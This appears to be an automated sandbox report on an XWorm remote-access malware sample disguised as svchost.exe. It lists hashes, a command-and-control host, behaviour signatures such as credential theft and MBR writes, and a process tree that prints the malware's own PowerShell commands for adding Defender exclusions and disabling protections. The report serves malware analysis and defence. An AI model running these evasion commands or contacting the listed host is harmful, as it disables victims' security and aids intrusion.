Analysis
-
max time kernel
195s -
max time network
207s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-01-2025 19:56
Behavioral task
behavioral1
Sample
svchost.exe
Resource
win10v2004-20241007-en
Errors
General
-
Target
svchost.exe
-
Size
7.4MB
-
MD5
b8a0e52ab1cfe75d6488f5dc1cc7be42
-
SHA1
caa8634648941cd907887a848e4b5c663c27cc75
-
SHA256
30ede8f22753f8e4eafb2e6274315d5fe3af3854b585178db9ceeee5b6fe9718
-
SHA512
05f69985a0ec1be51a81e25cae2dff53e16e2ea5fef2fc6bb653eca9cb1dea77ef21823a59de4073c18312e945a741ac6797b5e3b03e8a919d14e2b543088f23
-
SSDEEP
196608:LR0cDpLjv+bhqNVoBKUh8mz4Iv9PPv1DVWhy:CiRL+9qz8/b4IRv3Why
Malware Config
Extracted
xworm
trip-thesaurus.gl.at.ply.gg:16715
-
Install_directory
%AppData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000b000000023b8f-90.dat family_xworm behavioral1/memory/4408-91-0x0000000000390000-0x00000000003A8000-memory.dmp family_xworm -
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1256 powershell.exe 400 powershell.exe 3740 powershell.exe 884 powershell.exe 860 powershell.exe 4584 powershell.exe 372 powershell.exe 4432 powershell.exe 4332 powershell.exe 4224 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation bound.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation ybbhjh.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation ybbhjh.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3160 cmd.exe 4332 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecurityHealthSystray.lnk bound.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecurityHealthSystray.lnk bound.exe -
Executes dropped EXE 9 IoCs
pid Process 4408 bound.exe 864 rar.exe 4360 ybbhjh.exe 1080 ybbhjh.exe 4584 ybbhjh.exe 400 ybbhjh.exe 3132 ybbhjh.exe 2888 ybbhjh.exe 4660 ybbhjh.exe -
Loads dropped DLL 17 IoCs
pid Process 4072 svchost.exe 4072 svchost.exe 4072 svchost.exe 4072 svchost.exe 4072 svchost.exe 4072 svchost.exe 4072 svchost.exe 4072 svchost.exe 4072 svchost.exe 4072 svchost.exe 4072 svchost.exe 4072 svchost.exe 4072 svchost.exe 4072 svchost.exe 4072 svchost.exe 4072 svchost.exe 4072 svchost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthSystray = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthSystray" bound.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 23 discord.com 24 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 ybbhjh.exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 4160 tasklist.exe 3236 tasklist.exe 1068 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 1916 cmd.exe -
resource yara_rule behavioral1/files/0x000a000000023ba1-22.dat upx behavioral1/memory/4072-26-0x00007FFB5C760000-0x00007FFB5CD49000-memory.dmp upx behavioral1/files/0x000a000000023b93-28.dat upx behavioral1/files/0x000a000000023b9f-30.dat upx behavioral1/files/0x000a000000023b9a-49.dat upx behavioral1/memory/4072-50-0x00007FFB75850000-0x00007FFB7585F000-memory.dmp upx behavioral1/files/0x000a000000023b99-48.dat upx behavioral1/files/0x000a000000023b98-47.dat upx behavioral1/files/0x000a000000023b97-46.dat upx behavioral1/files/0x000a000000023b96-45.dat upx behavioral1/files/0x000a000000023b95-44.dat upx behavioral1/files/0x000a000000023b94-43.dat upx behavioral1/files/0x000a000000023b92-42.dat upx behavioral1/files/0x000a000000023ba6-41.dat upx behavioral1/files/0x000a000000023ba5-40.dat upx behavioral1/files/0x000a000000023ba4-39.dat upx behavioral1/files/0x000a000000023ba0-36.dat upx behavioral1/files/0x000a000000023b9e-35.dat upx behavioral1/memory/4072-31-0x00007FFB6F710000-0x00007FFB6F733000-memory.dmp upx behavioral1/memory/4072-56-0x00007FFB6B380000-0x00007FFB6B3AD000-memory.dmp upx behavioral1/memory/4072-58-0x00007FFB709D0000-0x00007FFB709E9000-memory.dmp upx behavioral1/memory/4072-60-0x00007FFB6BB40000-0x00007FFB6BB63000-memory.dmp upx behavioral1/memory/4072-62-0x00007FFB5C5E0000-0x00007FFB5C757000-memory.dmp upx behavioral1/memory/4072-64-0x00007FFB6BB20000-0x00007FFB6BB39000-memory.dmp upx behavioral1/memory/4072-66-0x00007FFB6BC90000-0x00007FFB6BC9D000-memory.dmp upx behavioral1/memory/4072-68-0x00007FFB6B9C0000-0x00007FFB6B9F3000-memory.dmp upx behavioral1/memory/4072-73-0x00007FFB5BFB0000-0x00007FFB5C07D000-memory.dmp upx behavioral1/memory/4072-76-0x00007FFB6F710000-0x00007FFB6F733000-memory.dmp upx behavioral1/memory/4072-75-0x00007FFB5BA80000-0x00007FFB5BFA2000-memory.dmp upx behavioral1/memory/4072-72-0x00007FFB5C760000-0x00007FFB5CD49000-memory.dmp upx behavioral1/memory/4072-78-0x00007FFB6B9A0000-0x00007FFB6B9B4000-memory.dmp upx behavioral1/memory/4072-81-0x00007FFB6B990000-0x00007FFB6B99D000-memory.dmp upx behavioral1/memory/4072-80-0x00007FFB6B380000-0x00007FFB6B3AD000-memory.dmp upx behavioral1/memory/4072-86-0x00007FFB709D0000-0x00007FFB709E9000-memory.dmp upx behavioral1/memory/4072-87-0x00007FFB5B7A0000-0x00007FFB5B8BC000-memory.dmp upx behavioral1/memory/4072-140-0x00007FFB6BB40000-0x00007FFB6BB63000-memory.dmp upx behavioral1/memory/4072-198-0x00007FFB5C5E0000-0x00007FFB5C757000-memory.dmp upx behavioral1/memory/4072-261-0x00007FFB6BB20000-0x00007FFB6BB39000-memory.dmp upx behavioral1/memory/4072-317-0x00007FFB6B9C0000-0x00007FFB6B9F3000-memory.dmp upx behavioral1/memory/4072-340-0x00007FFB5BFB0000-0x00007FFB5C07D000-memory.dmp upx behavioral1/memory/4072-365-0x00007FFB5BA80000-0x00007FFB5BFA2000-memory.dmp upx behavioral1/memory/4072-366-0x00007FFB5C760000-0x00007FFB5CD49000-memory.dmp upx behavioral1/memory/4072-372-0x00007FFB5C5E0000-0x00007FFB5C757000-memory.dmp upx behavioral1/memory/4072-367-0x00007FFB6F710000-0x00007FFB6F733000-memory.dmp upx behavioral1/memory/4072-381-0x00007FFB5C760000-0x00007FFB5CD49000-memory.dmp upx behavioral1/memory/4072-395-0x00007FFB5B7A0000-0x00007FFB5B8BC000-memory.dmp upx behavioral1/memory/4072-403-0x00007FFB6BB20000-0x00007FFB6BB39000-memory.dmp upx behavioral1/memory/4072-402-0x00007FFB5C5E0000-0x00007FFB5C757000-memory.dmp upx behavioral1/memory/4072-401-0x00007FFB6BB40000-0x00007FFB6BB63000-memory.dmp upx behavioral1/memory/4072-400-0x00007FFB709D0000-0x00007FFB709E9000-memory.dmp upx behavioral1/memory/4072-399-0x00007FFB6B380000-0x00007FFB6B3AD000-memory.dmp upx behavioral1/memory/4072-398-0x00007FFB75850000-0x00007FFB7585F000-memory.dmp upx behavioral1/memory/4072-397-0x00007FFB6F710000-0x00007FFB6F733000-memory.dmp upx behavioral1/memory/4072-396-0x00007FFB5BA80000-0x00007FFB5BFA2000-memory.dmp upx behavioral1/memory/4072-394-0x00007FFB6B990000-0x00007FFB6B99D000-memory.dmp upx behavioral1/memory/4072-393-0x00007FFB6B9A0000-0x00007FFB6B9B4000-memory.dmp upx behavioral1/memory/4072-391-0x00007FFB5BFB0000-0x00007FFB5C07D000-memory.dmp upx behavioral1/memory/4072-390-0x00007FFB6B9C0000-0x00007FFB6B9F3000-memory.dmp upx behavioral1/memory/4072-389-0x00007FFB6BC90000-0x00007FFB6BC9D000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ybbhjh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language calc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ybbhjh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3660 cmd.exe 1160 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3944 cmd.exe 4772 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2944 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4044 systeminfo.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings calc.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1160 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3740 powershell.exe 3740 powershell.exe 884 powershell.exe 884 powershell.exe 4332 powershell.exe 4332 powershell.exe 860 powershell.exe 860 powershell.exe 4432 powershell.exe 4432 powershell.exe 2896 powershell.exe 2896 powershell.exe 4332 powershell.exe 3740 powershell.exe 2896 powershell.exe 884 powershell.exe 860 powershell.exe 4432 powershell.exe 4332 powershell.exe 4332 powershell.exe 1972 powershell.exe 1972 powershell.exe 4584 powershell.exe 4584 powershell.exe 372 powershell.exe 372 powershell.exe 1256 powershell.exe 1256 powershell.exe 400 powershell.exe 400 powershell.exe 4224 powershell.exe 4224 powershell.exe 1880 powershell.exe 1880 powershell.exe 4408 bound.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1080 ybbhjh.exe 1080 ybbhjh.exe 4584 ybbhjh.exe 4584 ybbhjh.exe 400 ybbhjh.exe 1080 ybbhjh.exe 400 ybbhjh.exe 1080 ybbhjh.exe 1080 ybbhjh.exe 400 ybbhjh.exe 1080 ybbhjh.exe 400 ybbhjh.exe 3132 ybbhjh.exe 4584 ybbhjh.exe 3132 ybbhjh.exe 4584 ybbhjh.exe 1080 ybbhjh.exe 400 ybbhjh.exe 1080 ybbhjh.exe 400 ybbhjh.exe 4584 ybbhjh.exe 4584 ybbhjh.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4160 tasklist.exe Token: SeDebugPrivilege 3236 tasklist.exe Token: SeDebugPrivilege 4408 bound.exe Token: SeIncreaseQuotaPrivilege 3112 WMIC.exe Token: SeSecurityPrivilege 3112 WMIC.exe Token: SeTakeOwnershipPrivilege 3112 WMIC.exe Token: SeLoadDriverPrivilege 3112 WMIC.exe Token: SeSystemProfilePrivilege 3112 WMIC.exe Token: SeSystemtimePrivilege 3112 WMIC.exe Token: SeProfSingleProcessPrivilege 3112 WMIC.exe Token: SeIncBasePriorityPrivilege 3112 WMIC.exe Token: SeCreatePagefilePrivilege 3112 WMIC.exe Token: SeBackupPrivilege 3112 WMIC.exe Token: SeRestorePrivilege 3112 WMIC.exe Token: SeShutdownPrivilege 3112 WMIC.exe Token: SeDebugPrivilege 3112 WMIC.exe Token: SeSystemEnvironmentPrivilege 3112 WMIC.exe Token: SeRemoteShutdownPrivilege 3112 WMIC.exe Token: SeUndockPrivilege 3112 WMIC.exe Token: SeManageVolumePrivilege 3112 WMIC.exe Token: 33 3112 WMIC.exe Token: 34 3112 WMIC.exe Token: 35 3112 WMIC.exe Token: 36 3112 WMIC.exe Token: SeDebugPrivilege 3740 powershell.exe Token: SeDebugPrivilege 1068 tasklist.exe Token: SeDebugPrivilege 884 powershell.exe Token: SeDebugPrivilege 4332 powershell.exe Token: SeDebugPrivilege 860 powershell.exe Token: SeDebugPrivilege 4432 powershell.exe Token: SeDebugPrivilege 2896 powershell.exe Token: SeIncreaseQuotaPrivilege 3112 WMIC.exe Token: SeSecurityPrivilege 3112 WMIC.exe Token: SeTakeOwnershipPrivilege 3112 WMIC.exe Token: SeLoadDriverPrivilege 3112 WMIC.exe Token: SeSystemProfilePrivilege 3112 WMIC.exe Token: SeSystemtimePrivilege 3112 WMIC.exe Token: SeProfSingleProcessPrivilege 3112 WMIC.exe Token: SeIncBasePriorityPrivilege 3112 WMIC.exe Token: SeCreatePagefilePrivilege 3112 WMIC.exe Token: SeBackupPrivilege 3112 WMIC.exe Token: SeRestorePrivilege 3112 WMIC.exe Token: SeShutdownPrivilege 3112 WMIC.exe Token: SeDebugPrivilege 3112 WMIC.exe Token: SeSystemEnvironmentPrivilege 3112 WMIC.exe Token: SeRemoteShutdownPrivilege 3112 WMIC.exe Token: SeUndockPrivilege 3112 WMIC.exe Token: SeManageVolumePrivilege 3112 WMIC.exe Token: 33 3112 WMIC.exe Token: 34 3112 WMIC.exe Token: 35 3112 WMIC.exe Token: 36 3112 WMIC.exe Token: SeDebugPrivilege 4332 powershell.exe Token: SeDebugPrivilege 1972 powershell.exe Token: SeDebugPrivilege 4584 powershell.exe Token: SeDebugPrivilege 372 powershell.exe Token: SeDebugPrivilege 1256 powershell.exe Token: SeIncreaseQuotaPrivilege 4508 WMIC.exe Token: SeSecurityPrivilege 4508 WMIC.exe Token: SeTakeOwnershipPrivilege 4508 WMIC.exe Token: SeLoadDriverPrivilege 4508 WMIC.exe Token: SeSystemProfilePrivilege 4508 WMIC.exe Token: SeSystemtimePrivilege 4508 WMIC.exe Token: SeProfSingleProcessPrivilege 4508 WMIC.exe -
Suspicious use of FindShellTrayWindow 60 IoCs
pid Process 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe -
Suspicious use of SendNotifyMessage 60 IoCs
pid Process 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 1932 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe 2036 taskmgr.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 4408 bound.exe 4660 ybbhjh.exe 4324 OpenWith.exe 400 ybbhjh.exe 4584 ybbhjh.exe 1080 ybbhjh.exe 2888 ybbhjh.exe 400 ybbhjh.exe 1080 ybbhjh.exe 4584 ybbhjh.exe 2888 ybbhjh.exe 400 ybbhjh.exe 4584 ybbhjh.exe 1080 ybbhjh.exe 2888 ybbhjh.exe 1080 ybbhjh.exe 4584 ybbhjh.exe 400 ybbhjh.exe 2888 ybbhjh.exe 4584 ybbhjh.exe 400 ybbhjh.exe 1080 ybbhjh.exe 2888 ybbhjh.exe 1080 ybbhjh.exe 400 ybbhjh.exe 4584 ybbhjh.exe 2888 ybbhjh.exe 4584 ybbhjh.exe 400 ybbhjh.exe 1080 ybbhjh.exe 2888 ybbhjh.exe 1080 ybbhjh.exe 400 ybbhjh.exe 4584 ybbhjh.exe 2888 ybbhjh.exe 4584 ybbhjh.exe 1080 ybbhjh.exe 400 ybbhjh.exe 2888 ybbhjh.exe 400 ybbhjh.exe 4584 ybbhjh.exe 1080 ybbhjh.exe 2888 ybbhjh.exe 4584 ybbhjh.exe 1080 ybbhjh.exe 400 ybbhjh.exe 2888 ybbhjh.exe 400 ybbhjh.exe 1080 ybbhjh.exe 4584 ybbhjh.exe 2888 ybbhjh.exe 400 ybbhjh.exe 4584 ybbhjh.exe 1080 ybbhjh.exe 2888 ybbhjh.exe 1080 ybbhjh.exe 400 ybbhjh.exe 4584 ybbhjh.exe 2888 ybbhjh.exe 4584 ybbhjh.exe 1080 ybbhjh.exe 400 ybbhjh.exe 2888 ybbhjh.exe 400 ybbhjh.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2008 wrote to memory of 4072 2008 svchost.exe 83 PID 2008 wrote to memory of 4072 2008 svchost.exe 83 PID 4072 wrote to memory of 1800 4072 svchost.exe 84 PID 4072 wrote to memory of 1800 4072 svchost.exe 84 PID 4072 wrote to memory of 4616 4072 svchost.exe 85 PID 4072 wrote to memory of 4616 4072 svchost.exe 85 PID 4072 wrote to memory of 2052 4072 svchost.exe 86 PID 4072 wrote to memory of 2052 4072 svchost.exe 86 PID 4072 wrote to memory of 4544 4072 svchost.exe 87 PID 4072 wrote to memory of 4544 4072 svchost.exe 87 PID 4072 wrote to memory of 1916 4072 svchost.exe 88 PID 4072 wrote to memory of 1916 4072 svchost.exe 88 PID 4072 wrote to memory of 3224 4072 svchost.exe 89 PID 4072 wrote to memory of 3224 4072 svchost.exe 89 PID 4072 wrote to memory of 5024 4072 svchost.exe 96 PID 4072 wrote to memory of 5024 4072 svchost.exe 96 PID 4072 wrote to memory of 4576 4072 svchost.exe 97 PID 4072 wrote to memory of 4576 4072 svchost.exe 97 PID 5024 wrote to memory of 4160 5024 cmd.exe 100 PID 5024 wrote to memory of 4160 5024 cmd.exe 100 PID 4072 wrote to memory of 4972 4072 svchost.exe 101 PID 4072 wrote to memory of 4972 4072 svchost.exe 101 PID 4072 wrote to memory of 3160 4072 svchost.exe 102 PID 4072 wrote to memory of 3160 4072 svchost.exe 102 PID 4072 wrote to memory of 3760 4072 svchost.exe 103 PID 4072 wrote to memory of 3760 4072 svchost.exe 103 PID 4072 wrote to memory of 2092 4072 svchost.exe 106 PID 4072 wrote to memory of 2092 4072 svchost.exe 106 PID 4576 wrote to memory of 3236 4576 cmd.exe 108 PID 4576 wrote to memory of 3236 4576 cmd.exe 108 PID 1916 wrote to memory of 3784 1916 cmd.exe 110 PID 1916 wrote to memory of 3784 1916 cmd.exe 110 PID 4072 wrote to memory of 3944 4072 svchost.exe 111 PID 4072 wrote to memory of 3944 4072 svchost.exe 111 PID 4072 wrote to memory of 2348 4072 svchost.exe 114 PID 4072 wrote to memory of 2348 4072 svchost.exe 114 PID 4616 wrote to memory of 4432 4616 cmd.exe 115 PID 4616 wrote to memory of 4432 4616 cmd.exe 115 PID 4544 wrote to memory of 4408 4544 cmd.exe 112 PID 4544 wrote to memory of 4408 4544 cmd.exe 112 PID 4072 wrote to memory of 4580 4072 svchost.exe 116 PID 4072 wrote to memory of 4580 4072 svchost.exe 116 PID 1800 wrote to memory of 3740 1800 cmd.exe 119 PID 1800 wrote to memory of 3740 1800 cmd.exe 119 PID 3224 wrote to memory of 884 3224 cmd.exe 121 PID 3224 wrote to memory of 884 3224 cmd.exe 121 PID 4972 wrote to memory of 3112 4972 cmd.exe 124 PID 4972 wrote to memory of 3112 4972 cmd.exe 124 PID 3760 wrote to memory of 1068 3760 cmd.exe 122 PID 3760 wrote to memory of 1068 3760 cmd.exe 122 PID 3160 wrote to memory of 4332 3160 cmd.exe 123 PID 3160 wrote to memory of 4332 3160 cmd.exe 123 PID 2052 wrote to memory of 860 2052 cmd.exe 125 PID 2052 wrote to memory of 860 2052 cmd.exe 125 PID 3944 wrote to memory of 4772 3944 cmd.exe 126 PID 3944 wrote to memory of 4772 3944 cmd.exe 126 PID 2348 wrote to memory of 4044 2348 cmd.exe 127 PID 2348 wrote to memory of 4044 2348 cmd.exe 127 PID 2092 wrote to memory of 3776 2092 cmd.exe 129 PID 2092 wrote to memory of 3776 2092 cmd.exe 129 PID 4580 wrote to memory of 2896 4580 cmd.exe 128 PID 4580 wrote to memory of 2896 4580 cmd.exe 128 PID 4072 wrote to memory of 1092 4072 svchost.exe 130 PID 4072 wrote to memory of 1092 4072 svchost.exe 130 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3784 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'bound.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\SecurityHealthSystray'5⤵
